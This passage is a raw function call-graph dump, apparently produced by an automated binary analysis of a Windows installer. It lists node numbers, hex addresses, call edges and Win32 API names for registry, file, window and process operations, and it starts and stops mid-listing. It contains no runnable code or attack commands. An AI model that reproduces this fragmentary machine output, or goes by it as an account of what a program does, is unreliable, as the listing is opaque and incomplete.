3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4633 4020f9 GetDC GetDeviceCaps 4634 401446 18 API calls 4633->4634 4635 402116 MulDiv 4634->4635 4636 401446 18 API calls 4635->4636 4637 40212c 4636->4637 4638 406831 18 API calls 4637->4638 4639 402165 CreateFontIndirectW 4638->4639 4640 4030dc 4639->4640 4641 4030e3 4640->4641 4643 405f7d wsprintfW 4640->4643 4643->4641 4644 4024fb 4645 40145c 18 API calls 4644->4645 4646 402502 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40250c 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402515 4649->4650 4651 40145c 18 API calls 4650->4651 4652 40251f 4651->4652 4653 40145c 18 API calls 4652->4653 4654 402529 4653->4654 4655 40253d 4654->4655 4656 40145c 18 API calls 4654->4656 4657 4062cf 11 API calls 4655->4657 4656->4655 4658 40256a CoCreateInstance 4657->4658 4659 40258c 4658->4659 4660 4026fc 4662 402708 4660->4662 4663 401ee4 4660->4663 4661 406831 18 API calls 4661->4663 4663->4660 4663->4661 3807 4019fd 3808 40145c 18 API calls 3807->3808 3809 401a04 3808->3809 3812 405eab 3809->3812 3813 405eb8 GetTickCount GetTempFileNameW 3812->3813 3814 401a0b 3813->3814 3815 405eee 3813->3815 3815->3813 3815->3814 4664 4022fd 4665 40145c 18 API calls 4664->4665 4666 402304 GetFileVersionInfoSizeW 4665->4666 4667 4030e3 4666->4667 4668 40232b GlobalAlloc 4666->4668 4668->4667 4669 40233f GetFileVersionInfoW 4668->4669 4670 402350 VerQueryValueW 4669->4670 4671 402381 GlobalFree 4669->4671 4670->4671 4672 402369 4670->4672 4671->4667 4677 405f7d wsprintfW 4672->4677 4675 402375 4678 405f7d wsprintfW 4675->4678 4677->4675 4678->4671 4679 402afd 4680 40145c 18 API calls 4679->4680 4681 402b04 4680->4681 4686 405e7c GetFileAttributesW CreateFileW 4681->4686 4683 402b10 4684 4030e3 4683->4684 4687 405f7d wsprintfW 4683->4687 4686->4683 4687->4684 4688 4029ff 4689 401553 19 API calls 4688->4689 4690 402a09 4689->4690 4691 40145c 18 API calls 4690->4691 4692 402a12 4691->4692 4693 402a1f RegQueryValueExW 4692->4693 4697 401a13 4692->4697 4694 402a45 4693->4694 4695 402a3f 4693->4695 4696 4029e4 RegCloseKey 4694->4696 4694->4697 4695->4694 4699 405f7d wsprintfW 4695->4699 4696->4697 4699->4694 4700 401000 4701 401037 BeginPaint GetClientRect 4700->4701 4702 40100c DefWindowProcW 4700->4702 4704 4010fc 4701->4704 4705 401182 4702->4705 4706 401073 CreateBrushIndirect FillRect DeleteObject 4704->4706 4707 401105 4704->4707 4706->4704 4708 401170 EndPaint 4707->4708 4709 40110b CreateFontIndirectW 4707->4709 4708->4705 4709->4708 4710 40111b 6 API calls 4709->4710 4710->4708 4711 401f80 4712 401446 18 API calls 4711->4712 4713 401f88 4712->4713 4714 401446 18 API calls 4713->4714 4715 401f93 4714->4715 4716 401fa3 4715->4716 4717 40145c 18 API calls 4715->4717 4718 401fb3 4716->4718 4719 40145c 18 API calls 4716->4719 4717->4716 4720 402006 4718->4720 4721 401fbc 4718->4721 4719->4718 4722 40145c 18 API calls 4720->4722 4723 401446 18 API calls 4721->4723 4724 40200d 4722->4724 4725 401fc4 4723->4725 4727 40145c 18 API calls 4724->4727 4726 401446 18 API calls 4725->4726 4728 401fce 4726->4728 4729 402016 FindWindowExW 4727->4729 4730 401ff6 SendMessageW 4728->4730 4731 401fd8 SendMessageTimeoutW 4728->4731 4733 402036 4729->4733 4730->4733 4731->4733 4732 4030e3 4733->4732 4735 405f7d wsprintfW 4733->4735 4735->4732 4736 402880 4737 402884 4736->4737 4738 40145c 18 API calls 4737->4738 4739 4028a7 4738->4739 4740 40145c 18 API calls 4739->4740 4741 4028b1 4740->4741 4742 4028ba RegCreateKeyExW 4741->4742 4743 4028e8 4742->4743 4748 4029ef 4742->4748 4744 402934 4743->4744 4746 40145c 18 API calls 4743->4746 4745 402963 4744->4745 4747 401446 18 API calls 4744->4747 4749 4029ae RegSetValueExW 4745->4749 4752 40337f 33 API calls 4745->4752 4750 4028fc lstrlenW 4746->4750 4751 402947 4747->4751 4755 4029c6 RegCloseKey 4749->4755 4756 4029cb 4749->4756 4753 402918 4750->4753 4754 40292a 4750->4754 4758 4062cf 11 API calls 4751->4758 4759 40297b 4752->4759 4760 4062cf 11 API calls 4753->4760 4761 4062cf 11 API calls 4754->4761 4755->4748 4757 4062cf 11 API calls 4756->4757 4757->4755 4758->4745 4767 406250 4759->4767 4764 402922 4760->4764 4761->4744 4764->4749 4766 4062cf 11 API calls 4766->4764 4768 406273 4767->4768 4769 4062b6 4768->4769 4770 406288 wsprintfW 4768->4770 4771 402991 4769->4771 4772 4062bf lstrcatW 4769->4772 4770->4769 4770->4770 4771->4766 4772->4771 4773 403d02 4774 403d0d 4773->4774 4775 403d11 4774->4775 4776 403d14 GlobalAlloc 4774->4776 4776->4775 4777 402082 4778 401446 18 API calls 4777->4778 4779 402093 SetWindowLongW 4778->4779 4780 4030e3 4779->4780 4781 402a84 4782 401553 19 API calls 4781->4782 4783 402a8e 4782->4783 4784 401446 18 API calls 4783->4784 4785 402a98 4784->4785 4786 401a13 4785->4786 4787 402ab2 RegEnumKeyW 4785->4787 4788 402abe RegEnumValueW 4785->4788 4789 402a7e 4787->4789 4788->4786 4788->4789 4789->4786 4790 4029e4 RegCloseKey 4789->4790 4790->4786 4791 402c8a 4792 402ca2 4791->4792 4793 402c8f 4791->4793 4795 40145c 18 API calls 4792->4795 4794 401446 18 API calls 4793->4794 4797 402c97 4794->4797 4796 402ca9 lstrlenW 4795->4796 4796->4797 4798 401a13 4797->4798 4799 402ccb WriteFile 4797->4799 4799->4798 4800 401d8e 4801 40145c 18 API calls 4800->4801 4802 401d95 ExpandEnvironmentStringsW 4801->4802 4803 401da8 4802->4803 4804 401db9 4802->4804 4803->4804 4805 401dad lstrcmpW 4803->4805 4805->4804 4806 401e0f 4807 401446 18 API calls 4806->4807 4808 401e17 4807->4808 4809 401446 18 API calls 4808->4809 4810 401e21 4809->4810 4811 4030e3 4810->4811 4813 405f7d wsprintfW 4810->4813 4813->4811 4814 40438f 4815 4043c8 4814->4815 4816 40439f 4814->4816 4817 403df6 8 API calls 4815->4817 4818 403d6b 19 API calls 4816->4818 4820 4043d4 4817->4820 4819 4043ac SetDlgItemTextW 4818->4819 4819->4815 4821 403f90 4822 403fa0 4821->4822 4823 403fbc 4821->4823 4832 405cb0 GetDlgItemTextW 4822->4832 4825 403fc2 SHGetPathFromIDListW 4823->4825 4826 403fef 4823->4826 4828 403fd2 4825->4828 4831 403fd9 SendMessageW 4825->4831 4827 403fad SendMessageW 4827->4823 4829 40141d 80 API calls 4828->4829 4829->4831 4831->4826 4832->4827 4833 402392 4834 40145c 18 API calls 4833->4834 4835 402399 4834->4835 4838 407224 4835->4838 4839 406efe 25 API calls 4838->4839 4840 407244 4839->4840 4841 4023a7 4840->4841 4842 40724e lstrcpynW lstrcmpW 4840->4842 4843 407280 4842->4843 4844 407286 lstrcpynW 4842->4844 4843->4844 4844->4841 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4845 402797 4846 40145c 18 API calls 4845->4846 4847 4027ae 4846->4847 4848 40145c 18 API calls 4847->4848 4849 4027b7 4848->4849 4850 40145c 18 API calls 4849->4850 4851 4027c0 GetPrivateProfileStringW lstrcmpW 4850->4851 4852 401e9a 4853 40145c 18 API calls 4852->4853 4854 401ea1 4853->4854 4855 401446 18 API calls 4854->4855 4856 401eab wsprintfW 4855->4856 3816 401a1f 3817 40145c 18 API calls 3816->3817 3818 401a26 3817->3818 3819 4062cf 11 API calls 3818->3819 3820 401a49 3819->3820 3821 401a64 3820->3821 3822 401a5c 3820->3822 3891 406035 lstrcpynW 3821->3891 3890 406035 lstrcpynW 3822->3890 3825 401a6f 3892 40674e lstrlenW CharPrevW 3825->3892 3826 401a62 3829 406064 5 API calls 3826->3829 3860 401a81 3829->3860 3830 406301 2 API calls 3830->3860 3833 401a98 CompareFileTime 3833->3860 3834 401ba9 3835 404f9e 25 API calls 3834->3835 3837 401bb3 3835->3837 3836 401b5d 3838 404f9e 25 API calls 3836->3838 3869 40337f 3837->3869 3840 401b70 3838->3840 3844 4062cf 11 API calls 3840->3844 3842 406035 lstrcpynW 3842->3860 3843 4062cf 11 API calls 3845 401bda 3843->3845 3849 401b8b 3844->3849 3846 401be9 SetFileTime 3845->3846 3847 401bf8 CloseHandle 3845->3847 3846->3847 3847->3849 3850 401c09 3847->3850 3848 406831 18 API calls 3848->3860 3851 401c21 3850->3851 3852 401c0e 3850->3852 3853 406831 18 API calls 3851->3853 3854 406831 18 API calls 3852->3854 3855 401c29 3853->3855 3857 401c16 lstrcatW 3854->3857 3858 4062cf 11 API calls 3855->3858 3857->3855 3861 401c34 3858->3861 3859 401b50 3863 401b93 3859->3863 3864 401b53 3859->3864 3860->3830 3860->3833 3860->3834 3860->3836 3860->3842 3860->3848 3860->3859 3862 4062cf 11 API calls 3860->3862 3868 405e7c GetFileAttributesW CreateFileW 3860->3868 3895 405e5c GetFileAttributesW 3860->3895 3898 405ccc 3860->3898 3865 405ccc MessageBoxIndirectW 3861->3865 3862->3860 3866 4062cf 11 API calls 3863->3866 3867 4062cf 11 API calls 3864->3867 3865->3849 3866->3849 3867->3836 3868->3860 3870 40339a 3869->3870 3871 4033c7 3870->3871 3904 403368 SetFilePointer 3870->3904 3902 403336 ReadFile 3871->3902 3875 401bc6 3875->3843 3876 403546 3878 40354a 3876->3878 3879 40356e 3876->3879 3877 4033eb GetTickCount 3877->3875 3882 403438 3877->3882 3880 403336 ReadFile 3878->3880 3879->3875 3883 403336 ReadFile 3879->3883 3884 40358d WriteFile 3879->3884 3880->3875 3881 403336 ReadFile 3881->3882 3882->3875 3882->3881 3886 40348a GetTickCount 3882->3886 3887 4034af MulDiv wsprintfW 3882->3887 3889 4034f3 WriteFile 3882->3889 3883->3879 3884->3875 3885 4035a1 3884->3885 3885->3875 3885->3879 3886->3882 3888 404f9e 25 API calls 3887->3888 3888->3882 3889->3875 3889->3882 3890->3826 3891->3825 3893 401a75 lstrcatW 3892->3893 3894 40676b lstrcatW 3892->3894 3893->3826 3894->3893 3896 405e79 3895->3896 3897 405e6b SetFileAttributesW 3895->3897 3896->3860 3897->3896 3899 405ce1 3898->3899 3900 405d2f 3899->3900 3901 405cf7 MessageBoxIndirectW 3899->3901 3900->3860 3901->3900 3903 403357 3902->3903 3903->3875 3903->3876 3903->3877 3904->3871 4857 40209f GetDlgItem GetClientRect 4858 40145c 18 API calls 4857->4858 4859 4020cf LoadImageW SendMessageW 4858->4859 4860 4030e3 4859->4860 4861 4020ed DeleteObject 4859->4861 4861->4860 4862 402b9f 4863 401446 18 API calls 4862->4863 4867 402ba7 4863->4867 4864 402c4a 4865 402bdf ReadFile 4865->4867 4874 402c3d 4865->4874 4866 401446 18 API calls 4866->4874 4867->4864 4867->4865 4868 402c06 MultiByteToWideChar 4867->4868 4869 402c3f 4867->4869 4870 402c4f 4867->4870 4867->4874 4868->4867 4868->4870 4875 405f7d wsprintfW 4869->4875 4872 402c6b SetFilePointer 4870->4872 4870->4874 4872->4874 4873 402d17 ReadFile 4873->4874 4874->4864 4874->4866 4874->4873 4875->4864 4876 402b23 GlobalAlloc 4877 402b39 4876->4877 4878 402b4b 4876->4878 4879 401446 18 API calls 4877->4879 4880 40145c 18 API calls 4878->4880 4882 402b41 4879->4882 4881 402b52 WideCharToMultiByte lstrlenA 4880->4881 4881->4882 4883 402b84 WriteFile 4882->4883 4884 402b93 4882->4884 4883->4884 4885 402384 GlobalFree 4883->4885 4885->4884 4887 4040a3 4888 4040b0 lstrcpynW lstrlenW 4887->4888 4889 4040ad 4887->4889 4889->4888 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a KiUserCallbackDispatcher KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4890 402da5 4891 4030e3 4890->4891 4892 402dac 4890->4892 4893 401446 18 API calls 4892->4893 4894 402db8 4893->4894 4895 402dbf SetFilePointer 4894->4895 4895->4891 4896 402dcf 4895->4896 4896->4891 4898 405f7d wsprintfW 4896->4898 4898->4891 4899 4049a8 GetDlgItem GetDlgItem 4900 4049fe 7 API calls 4899->4900 4905 404c16 4899->4905 4901 404aa2 DeleteObject 4900->4901 4902 404a96 SendMessageW 4900->4902 4903 404aad 4901->4903 4902->4901 4906 404ae4 4903->4906 4909 406831 18 API calls 4903->4909 4904 404cfb 4907 404da0 4904->4907 4908 404c09 4904->4908 4913 404d4a SendMessageW 4904->4913 4905->4904 4917 40487a 5 API calls 4905->4917 4930 404c86 4905->4930 4912 403d6b 19 API calls 4906->4912 4910 404db5 4907->4910 4911 404da9 SendMessageW 4907->4911 4914 403df6 8 API calls 4908->4914 4915 404ac6 SendMessageW SendMessageW 4909->4915 4922 404dc7 ImageList_Destroy 4910->4922 4923 404dce 4910->4923 4928 404dde 4910->4928 4911->4910 4918 404af8 4912->4918 4913->4908 4920 404d5f SendMessageW 4913->4920 4921 404f97 4914->4921 4915->4903 4916 404ced SendMessageW 4916->4904 4917->4930 4924 403d6b 19 API calls 4918->4924 4919 404f48 4919->4908 4929 404f5d ShowWindow GetDlgItem ShowWindow 4919->4929 4925 404d72 4920->4925 4922->4923 4926 404dd7 GlobalFree 4923->4926 4923->4928 4932 404b09 4924->4932 4934 404d83 SendMessageW 4925->4934 4926->4928 4927 404bd6 GetWindowLongW SetWindowLongW 4931 404bf0 4927->4931 4928->4919 4933 40141d 80 API calls 4928->4933 4943 404e10 4928->4943 4929->4908 4930->4904 4930->4916 4935 404bf6 ShowWindow 4931->4935 4936 404c0e 4931->4936 4932->4927 4938 404b65 SendMessageW 4932->4938 4939 404bd0 4932->4939 4941 404b93 SendMessageW 4932->4941 4942 404ba7 SendMessageW 4932->4942 4933->4943 4934->4907 4950 403dc4 SendMessageW 4935->4950 4951 403dc4 SendMessageW 4936->4951 4938->4932 4939->4927 4939->4931 4941->4932 4942->4932 4944 404e54 4943->4944 4947 404e3e SendMessageW 4943->4947 4945 404f1f InvalidateRect 4944->4945 4949 404ecd SendMessageW SendMessageW 4944->4949 4945->4919 4946 404f35 4945->4946 4948 4043d9 21 API calls 4946->4948 4947->4944 4948->4919 4949->4944 4950->4908 4951->4905 4952 4030a9 SendMessageW 4953 4030c2 InvalidateRect 4952->4953 4954 4030e3 4952->4954 4953->4954 3905 4038af #17 SetErrorMode OleInitialize 3906 406328 3 API calls 3905->3906 3907 4038f2 SHGetFileInfoW 3906->3907 3979 406035 lstrcpynW 3907->3979 3909 40391d GetCommandLineW 3980 406035 lstrcpynW 3909->3980 3911 40392f GetModuleHandleW 3912 403947 3911->3912 3913 405d32 CharNextW 3912->3913 3914 403956 CharNextW 3913->3914 3925 403968 3914->3925 3915 403a02 3916 403a21 GetTempPathW 3915->3916 3981 4037f8 3916->3981 3918 403a37 3920 403a3b GetWindowsDirectoryW lstrcatW 3918->3920 3921 403a5f DeleteFileW 3918->3921 3919 405d32 CharNextW 3919->3925 3923 4037f8 11 API calls 3920->3923 3989 4035b3 GetTickCount GetModuleFileNameW 3921->3989 3926 403a57 3923->3926 3924 403a73 3927 403af8 3924->3927 3929 405d32 CharNextW 3924->3929 3965 403add 3924->3965 3925->3915 3925->3919 3932 403a04 3925->3932 3926->3921 3926->3927 4074 403885 3927->4074 3933 403a8a 3929->3933 4081 406035 lstrcpynW 3932->4081 3944 403b23 lstrcatW lstrcmpiW 3933->3944 3945 403ab5 3933->3945 3934 403aed 3937 406113 9 API calls 3934->3937 3935 403bfa 3938 403c7d 3935->3938 3940 406328 3 API calls 3935->3940 3936 403b0d 3939 405ccc MessageBoxIndirectW 3936->3939 3937->3927 3941 403b1b ExitProcess 3939->3941 3943 403c09 3940->3943 3947 406328 3 API calls 3943->3947 3944->3927 3946 403b3f CreateDirectoryW SetCurrentDirectoryW 3944->3946 4082 4067aa 3945->4082 3949 403b62 3946->3949 3950 403b57 3946->3950 3951 403c12 3947->3951 4099 406035 lstrcpynW 3949->4099 4098 406035 lstrcpynW 3950->4098 3955 406328 3 API calls 3951->3955 3958 403c1b 3955->3958 3957 403b70 4100 406035 lstrcpynW 3957->4100 3959 403c69 ExitWindowsEx 3958->3959 3964 403c29 GetCurrentProcess 3958->3964 3959->3938 3963 403c76 3959->3963 3960 403ad2 4097 406035 lstrcpynW 3960->4097 3966 40141d 80 API calls 3963->3966 3968 403c39 3964->3968 4017 405958 3965->4017 3966->3938 3967 406831 18 API calls 3969 403b98 DeleteFileW 3967->3969 3968->3959 3970 403ba5 CopyFileW 3969->3970 3976 403b7f 3969->3976 3970->3976 3971 403bee 3972 406c94 42 API calls 3971->3972 3974 403bf5 3972->3974 3973 406c94 42 API calls 3973->3976 3974->3927 3975 406831 18 API calls 3975->3976 3976->3967 3976->3971 3976->3973 3976->3975 3978 403bd9 CloseHandle 3976->3978 4101 405c6b CreateProcessW 3976->4101 3978->3976 3979->3909 3980->3911 3982 406064 5 API calls 